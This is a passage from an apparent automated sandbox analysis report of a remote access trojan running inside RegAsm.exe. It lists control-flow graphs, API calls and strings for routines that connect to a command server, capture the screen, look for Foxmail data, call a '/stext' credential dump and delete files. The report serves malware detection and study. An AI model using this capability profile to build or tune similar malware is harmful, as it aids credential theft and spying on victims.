695 4153cd-4153f4 call 401fab call 4135e1 629->695 642 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->642 643 415b18-415b20 call 401e8d 630->643 642->643 643->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                                          APIs
                                          • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                          • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$ErrorLastLocalTime
                                          • String ID: | $%I64u$0op$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-OT0ZCG$TLS Off$TLS On $`.p$dMG$hlight$name$NG$NG$PG$PG$PG
                                          • API String ID: 524882891-847502806
                                          • Opcode ID: dce4dbc1c9552ef97593c32f0aba4e48013e2fbb171476585201c2d95aca7576
                                          • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                          • Opcode Fuzzy Hash: dce4dbc1c9552ef97593c32f0aba4e48013e2fbb171476585201c2d95aca7576
                                          • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                          Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 971 418eb1-418ef8 CreateDCA CreateCompatibleDC call 419360 974 418efa-418efc 971->974 975 418efe-418f19 call 4193a2 971->975 974->975 976 418f1d-418f1f 974->976 975->976 979 418f71-418f78 call 402093 976->979 980 418f21-418f23 976->980 984 418f7d-418f89 979->984 980->979 981 418f25-418f5c call 4193d8 CreateCompatibleBitmap 980->981 986 418f8a-418f94 SelectObject 981->986 987 418f5e-418f6a DeleteDC * 2 981->987 989 418fa5-418fcc StretchBlt 986->989 990 418f96 986->990 988 418f6b DeleteObject 987->988 988->979 989->990 991 418fce-418fd3 989->991 992 418f97-418fa3 DeleteDC * 2 990->992 993 418fd5-418fea GetCursorInfo 991->993 994 41904f-419057 991->994 992->988 993->994 995 418fec-419000 GetIconInfo 993->995 996 419099-4190ab GetObjectA 994->996 997 419059-419060 994->997 995->994 998 419002-41904b DeleteObject * 2 DrawIcon 995->998 996->990 1001 4190b1-4190c3 996->1001 999 419062-419087 BitBlt 997->999 1000 419089-419096 997->1000 998->994 999->996 1000->996 1002 4190c5-4190c7 1001->1002 1003 4190c9-4190d3 1001->1003 1004 419100 1002->1004 1005 4190d5-4190df 1003->1005 1006 419104-41910d 1003->1006 1004->1006 1005->1006 1008 4190e1-4190eb 1005->1008 1007 41910e-419148 LocalAlloc 1006->1007 1009 419154-41918b GlobalAlloc 1007->1009 1010 41914a-419151 1007->1010 1008->1006 1011 4190ed-4190f3 1008->1011 1014 419196-4191ab GetDIBits 1009->1014 1015 41918d-419191 1009->1015 1010->1009 1012 4190f5-4190fb 1011->1012 1013 4190fd-4190ff 1011->1013 1012->1007 1013->1004 1016 4191d3-41929b call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 1014->1016 1017 4191ad-4191ce DeleteDC * 2 DeleteObject GlobalFree 1014->1017 1015->992 1034 4192a0-4192c4 call 402055 call 401fd8 * 2 1016->1034 1035 41929d-41929e DeleteDC 1016->1035 1017->979 1034->984 1035->1034
                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                          • GetIconInfo.USER32 ref: 00418FF8
                                          • DeleteObject.GDI32(?), ref: 00419027
                                          • DeleteObject.GDI32(?), ref: 00419034
                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                          • DeleteDC.GDI32(?), ref: 004191B7
                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                          • GlobalFree.KERNELBASE(?), ref: 00419283
                                          • DeleteDC.GDI32(?), ref: 00419293
                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                          • String ID: DISPLAY
                                          • API String ID: 4256916514-865373369
                                          • Opcode ID: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                          • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                          • Opcode Fuzzy Hash: dfe77fb2dceb0fbb205aabf54f767b908c25502d30906bbb63463b6629d02dd1
                                          • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                          Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1042 412aef-412b38 GetModuleFileNameW call 4020df * 3 1049 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 1042->1049 1074 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1049->1074 1097 412c66 1074->1097 1098 412c58-412c60 Sleep 1074->1098 1099 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1097->1099 1098->1074 1098->1097 1122 412d08 1099->1122 1123 412cfa-412d02 Sleep 1099->1123 1124 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1122->1124 1123->1099 1123->1122 1147 412daa-412dcf 1124->1147 1148 412d9c-412da4 Sleep 1124->1148 1149 412dd3-412def call 401f04 call 41c516 1147->1149 1148->1124 1148->1147 1154 412df1-412e00 call 401f04 DeleteFileW 1149->1154 1155 412e06-412e22 call 401f04 call 41c516 1149->1155 1154->1155 1162 412e24-412e3d call 401f04 DeleteFileW 1155->1162 1163 412e3f 1155->1163 1165 412e43-412e5f call 401f04 call 41c516 1162->1165 1163->1165 1171 412e61-412e73 call 401f04 DeleteFileW 1165->1171 1172 412e79-412e7b 1165->1172 1171->1172 1174 412e88-412e93 Sleep 1172->1174 1175 412e7d-412e7f 1172->1175 1174->1149 1176 412e99-412eab call 406b63 1174->1176 1175->1174 1178 412e81-412e86 1175->1178 1181 412f01-412f20 call 401f09 * 3 1176->1181 1182 412ead-412ebb call 406b63 1176->1182 1178->1174 1178->1176 1193 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1181->1193 1182->1181 1188 412ebd-412ecb call 406b63 1182->1188 1188->1181 1194 412ecd-412ef9 Sleep call 401f09 * 3 1188->1194 1209 412f63-412f89 call 401f09 call 405b05 1193->1209 1194->1049 1207 412eff 1194->1207 1207->1193 1214 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1209->1214 1215 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1209->1215 1284 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1214->1284 1215->1284
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                          • String ID: /stext "$0TG$0TG$NG$NG
                                          • API String ID: 1223786279-2576077980
                                          • Opcode ID: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                          • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                          • Opcode Fuzzy Hash: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                          • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                          Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                          • lstrlenW.KERNEL32(?), ref: 100014C5
                                          • lstrlenW.KERNEL32(?), ref: 100014E0
                                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                          • String ID: )$Foxmail$ProgramFiles
                                          • API String ID: 672098462-2938083778
                                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                          Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1357 414dc1-414dfd 1358 414e03-414e18 GetSystemDirectoryA 1357->1358 1359 414f18-414f23 1357->1359 1360 414f0e 1358->1360 1361 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1358->1361 1360->1359 1366 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1361->1366 1367 414e6c-414e76 GetProcAddress 1361->1367 1380 414f0a-414f0d 1366->1380 1381 414ebd-414ec7 GetProcAddress 1366->1381 1368 414e78-414e7b FreeLibrary 1367->1368 1369 414e7d-414e7f 1367->1369 1368->1369 1369->1366 1371 414ed2 1369->1371 1374 414ed4-414ee5 GetProcAddress 1371->1374 1375 414ee7-414eeb 1374->1375 1376 414eef-414ef2 FreeLibrary 1374->1376 1375->1374 1378 414eed 1375->1378 1379 414ef4-414ef6 1376->1379 1378->1379 1379->1380 1382 414ef8-414f08 1379->1382 1380->1360 1383 414ec9-414ecc FreeLibrary 1381->1383 1384 414ece-414ed0 1381->1384 1382->1380 1382->1382 1383->1384 1384->1371 1384->1380
                                          APIs
                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                          • API String ID: 2490988753-744132762
                                          • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                          • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                          • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                          • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                          Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1385 4048c8-4048e8 connect 1386 404a1b-404a1f 1385->1386 1387 4048ee-4048f1 1385->1387 1390 404a21-404a2f WSAGetLastError 1386->1390 1391 404a97 1386->1391 1388 404a17-404a19 1387->1388 1389 4048f7-4048fa 1387->1389 1392 404a99-404a9e 1388->1392 1393 404926-404930 call 420cf1 1389->1393 1394 4048fc-404923 call 40531e call 402093 call 41b580 1389->1394 1390->1391 1395 404a31-404a34 1390->1395 1391->1392 1407 404941-40494e call 420f20 1393->1407 1408 404932-40493c 1393->1408 1394->1393 1397 404a71-404a76 1395->1397 1398 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1395->1398 1400 404a7b-404a94 call 402093 * 2 call 41b580 1397->1400 1398->1391 1400->1391 1417 404950-404973 call 402093 * 2 call 41b580 1407->1417 1418 404987-404992 call 421ad1 1407->1418 1408->1400 1447 404976-404982 call 420d31 1417->1447 1431 4049c4-4049d1 call 420e97 1418->1431 1432 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1418->1432 1444 4049d3-4049f6 call 402093 * 2 call 41b580 1431->1444 1445 4049f9-404a14 CreateEventW * 2 1431->1445 1432->1447 1444->1445 1445->1388 1447->1391
                                          APIs
                                          • connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                          • API String ID: 994465650-2151626615
                                          • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                          • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                          • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                          • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                          Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                          • CloseHandle.KERNEL32(?), ref: 00404E4C
                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                          • String ID:
                                          • API String ID: 3658366068-0
                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                          Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1477 40da6f-40da94 call 401f86 1480 40da9a 1477->1480 1481 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1477->1481 1482 40dae0-40dae7 call 41c048 1480->1482 1483 40daa1-40daa6 1480->1483 1484 40db93-40db98 1480->1484 1485 40dad6-40dadb 1480->1485 1486 40dba9 1480->1486 1487 40db9a-40db9f call 43c11f 1480->1487 1488 40daab-40dab9 call 41b645 call 401f13 1480->1488 1489 40dacc-40dad1 1480->1489 1490 40db8c-40db91 1480->1490 1503 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1482->1503 1504 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1482->1504 1493 40dbae-40dbb3 call 43c11f 1483->1493 1484->1493 1485->1493 1486->1493 1499 40dba4-40dba7 1487->1499 1511 40dabe 1488->1511 1489->1493 1490->1493 1505 40dbb4-40dbb9 call 409092 1493->1505 1499->1486 1499->1505 1516 40dac2-40dac7 call 401f09 1503->1516 1504->1511 1505->1481 1511->1516 1516->1481
                                          APIs
                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LongNamePath
                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 82841172-425784914
                                          • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                          • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                          Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1559 44acc9-44ace2 1560 44ace4-44acf4 call 4467e6 1559->1560 1561 44acf8-44acfd 1559->1561 1560->1561 1568 44acf6 1560->1568 1563 44acff-44ad07 1561->1563 1564 44ad0a-44ad2e MultiByteToWideChar 1561->1564 1563->1564 1566 44ad34-44ad40 1564->1566 1567 44aec1-44aed4 call 43502b 1564->1567 1569 44ad94 1566->1569 1570 44ad42-44ad53 1566->1570 1568->1561 1572 44ad96-44ad98 1569->1572 1573 44ad55-44ad64 call 457210 1570->1573 1574 44ad72-44ad83 call 4461b8 1570->1574 1576 44aeb6 1572->1576 1577 44ad9e-44adb1 MultiByteToWideChar 1572->1577 1573->1576 1587 44ad6a-44ad70 1573->1587 1574->1576 1584 44ad89 1574->1584 1582 44aeb8-44aebf call 435ecd 1576->1582 1577->1576 1581 44adb7-44adc9 call 448c33 1577->1581 1589 44adce-44add2 1581->1589 1582->1567 1588 44ad8f-44ad92 1584->1588 1587->1588 1588->1572 1589->1576 1591 44add8-44addf 1589->1591 1592 44ade1-44ade6 1591->1592 1593 44ae19-44ae25 1591->1593 1592->1582 1596 44adec-44adee 1592->1596 1594 44ae27-44ae38 1593->1594 1595 44ae71 1593->1595 1597 44ae53-44ae64 call 4461b8 1594->1597 1598 44ae3a-44ae49 call 457210 1594->1598 1599 44ae73-44ae75 1595->1599 1596->1576 1600 44adf4-44ae0e call 448c33 1596->1600 1604 44aeaf-44aeb5 call 435ecd 1597->1604 1613 44ae66 1597->1613 1598->1604 1611 44ae4b-44ae51 1598->1611 1603 44ae77-44ae90 call 448c33 1599->1603 1599->1604 1600->1582 1615 44ae14 1600->1615 1603->1604 1616 44ae92-44ae99 1603->1616 1604->1576 1617 44ae6c-44ae6f 1611->1617 1613->1617 1615->1576 1618 44aed5-44aedb 1616->1618 1619 44ae9b-44ae9c 1616->1619 1617->1599 1620 44ae9d-44aead WideCharToMultiByte 1618->1620 1619->1620 1620->1604 1621 44aedd-44aee4 call 435ecd 1620->1621 